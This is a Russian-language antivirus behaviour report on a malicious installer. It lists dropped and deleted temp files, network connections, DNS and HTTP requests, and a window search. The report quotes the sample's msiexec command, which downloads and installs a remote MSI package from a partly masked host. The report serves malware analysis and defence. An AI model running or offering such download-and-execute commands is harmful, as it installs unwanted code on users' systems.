Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%TEMP%\DmiUJ.exe'
Запускает на исполнение:
- '<SYSTEM32>\msiexec.exe' /i "http://pl####.cdnpckgs.eu/client/pkgs/viplounge/RubySlots20140401031010.msi" DDC_DID=2120131 DDC_RTGURL=http://www.se###dlh.com/dl/TrackSetup/TrackSetup.aspx?DI######### DDC_UPDATESTATUSURL...
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\~3.tmp
- %TEMP%\_is4.tmp
- %TEMP%\_is6.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\~5.tmp
- %TEMP%\{B1328F6C-712C-4AA6-BC25-D9DE7A045B1E}\0x0409.ini
- %TEMP%\_is1.tmp
- %TEMP%\DmiUJ.exe
- %TEMP%\{B1328F6C-712C-4AA6-BC25-D9DE7A045B1E}\Setup.INI
- %TEMP%\_is2.tmp
- %TEMP%\{B1328F6C-712C-4AA6-BC25-D9DE7A045B1E}\_ISMSIDEL.INI
Удаляет следующие файлы:
- %TEMP%\_is6.tmp
- %TEMP%\~5.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\~3.tmp
- %TEMP%\_is1.tmp
- %TEMP%\_is2.tmp
- %TEMP%\_is4.tmp
Сетевая активность:
Подключается к:
- 'pl####.cdnpckgs.eu':80
- 'wp#d':80
TCP:
Запросы HTTP GET:
- http://pl####.cdnpckgs.eu/client/pkgs/viplounge/RubySlots20140401031010.msi
- http://11#.#11.111.1/wpad.dat via wp#d
UDP:
- DNS ASK pl####.cdnpckgs.eu
- DNS ASK wp#d
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
